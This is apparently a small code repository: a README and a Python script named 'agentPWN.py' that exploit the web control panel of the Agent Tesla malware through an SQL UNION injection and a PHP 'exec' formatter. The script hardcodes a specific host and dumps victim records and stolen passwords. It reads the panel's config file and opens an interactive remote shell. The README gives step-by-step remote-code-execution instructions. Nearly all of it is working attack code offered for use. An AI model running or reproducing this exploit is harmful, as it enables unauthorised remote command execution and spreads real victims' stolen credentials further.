├── README.md
└── agentPWN.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Agent-Tesla-Exploit
 2 | 
 3 | Exploits the Datatables demo unsanatized get paramerters to query database and run code remotly
 4 | 
 5 | Currently:
 6 | * Grabs Victims
 7 | * Grabs Victim Passwords
 8 | * Exposes Panel Config
 9 | * Basic Shell
10 | 
11 | ### How to use the RCE on your own
12 | The file `WebServer/server_side/scripts/server processing` has 4 get paramerters:
13 | * `table` : Database Table
14 | * `primary` : Database Primary Key
15 | * `clmns` : Columns as sanatized array & optional formatter
16 | * `where`: SQL Where statment encoded in base64
17 | 
18 | To use, query `WebServer/server_side/scripts/server processing` with vaild table and primary paramerters
19 | (i use `passwords` and `password_id`) and `clmns` as the sanatized version of:
20 | ```php
21 | [array("db" => "[Vailed Column]", "dt" => "username","formatter" => "exec")]
22 | ```
23 | and the `where` paramerter to the base64 equlivant of:
24 | ```
25 | 1=1 UNION SELECT "[your command here]"
26 | ```
27 | 
28 | 


--------------------------------------------------------------------------------
/agentPWN.py:
--------------------------------------------------------------------------------
 1 | # Agent Tesla Exploit By Yattaze
 2 | import requests, base64
 3 | HOST = "http://equator-motorsport.ml"
 4 | EXPLOIT_PATH = "/WebPanel/server_side/scripts/server_processing.php"
 5 | URL = HOST + EXPLOIT_PATH
 6 | 
 7 | def grabVictims():
 8 |     BOT_IP_EXPLOIT = {'table': 'victims',
 9 |                       'primary': 'id',
10 |                       'clmns': 'a:5:{i:0;a:2:{s:2:"db";s:2:"id";s:2:"dt";i:0;}i:1;a:2:{s:2:"db";s:4:"hwid";s:2:"dt";i:1;}i:2;a:2:{s:2:"db";s:9:"ip_addres";s:2:"dt";i:2;}i:3;a:2:{s:2:"db";s:7:"pc_name";s:2:"dt";i:3;}i:4;a:2:{s:2:"db";s:6:"status";s:2:"dt";i:4;}}'
11 |                       }
12 |     r = requests.get(url = URL, params = BOT_IP_EXPLOIT)
13 |     ret = r.json()
14 |     print('[*] Exploiting: ' + HOST + ' for Victim Info\'s')
15 |     print('[*] ' + str(ret['recordsTotal']) + ' Victims\n')
16 |     print('ID : HWID : IP ADDRESS : PC NAME : STATUS')
17 |     for i in ret['data']: print(i[0] + " : " + i[1] + " : " + i[2] + " : " + i[3] + " : " + i[4])
18 |         
19 |         
20 | 
21 | def grabPasswords():
22 |     PASS_EXPLOIT = {'table': 'passwords',
23 |                     'primary': 'password_id',
24 |                     'clmns': 'a:3:{i:0;a:2:{s:2:"db";s:4:"host";s:2:"dt";i:0;}i:1;a:2:{s:2:"db";s:8:"username";s:2:"dt";i:1;}i:2;a:2:{s:2:"db";s:3:"pwd";s:2:"dt";i:2;}}'
25 |                     }
26 |     r = requests.get(url = URL, params = PASS_EXPLOIT)
27 |     ret = r.json()
28 |     print('[*] Exploiting: ' + HOST + ' for Victim Passwords\'s')
29 |     print('[*] Total Passwords: ' + str(ret['recordsTotal']) + "\n")
30 |     print('HOST : USERNAME : PASSWORD\n')
31 |     for i in ret['data']: print(i[0] + " : " + i[1] + " : " + i[2])
32 | 
33 | def grabConfig():
34 |     print('[*] Exploiting: ' + HOST + ' for Panel Config')
35 |     EXPLOIT1 = {'table': 'passwords',
36 |                 'primary': 'password_id',
37 |                 'clmns': 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
38 |                 'where': 'MT0xIFVOSU9OIFNFTEVDVCAiZmluZCAvIC1uYW1lICdjb25maWcucGhwJyI='
39 |                 }
40 |     r = requests.get(url = URL, params = EXPLOIT1)
41 |     ret = r.json()
42 |     for k, v in ret['data'][-1].items(): config = v
43 |     print('[*] Got config location: ' + v)
44 |     where = base64.standard_b64encode('1=1 UNION SELECT \"cat '+config+' > pwn.txt\"')
45 |     print('[*] Constructed Exploit: ' + where)
46 |     EXPLOIT2 = {'table': 'passwords',
47 |                 'primary': 'password_id',
48 |                 'clmns': 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
49 |                 'where': where
50 |                 }
51 |     r = requests.get(url = URL, params = EXPLOIT2)
52 |     p = HOST + "/WebPanel/server_side/scripts/pwn.txt"
53 |     r = requests.get(url = p)
54 |     print("\n[+] Exploited\n" + r.content)
55 | 
56 | def shell():
57 |     print('[*] Starting Shell on ' + HOST)
58 |     while True:
59 |         cmd = raw_input('>')
60 |         where = base64.standard_b64encode('1=1 UNION SELECT \"'+cmd+'\"')
61 |         EXPLOIT = {'table': 'passwords',
62 |                     'primary': 'password_id',
63 |                     'clmns': 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
64 |                     'where': where
65 |                     }
66 |         r = requests.get(url = URL, params = EXPLOIT)
67 |         for k, v in r.json()['data'][-1].items(): print(v)
68 | 
69 | grabVictims()
70 | 


--------------------------------------------------------------------------------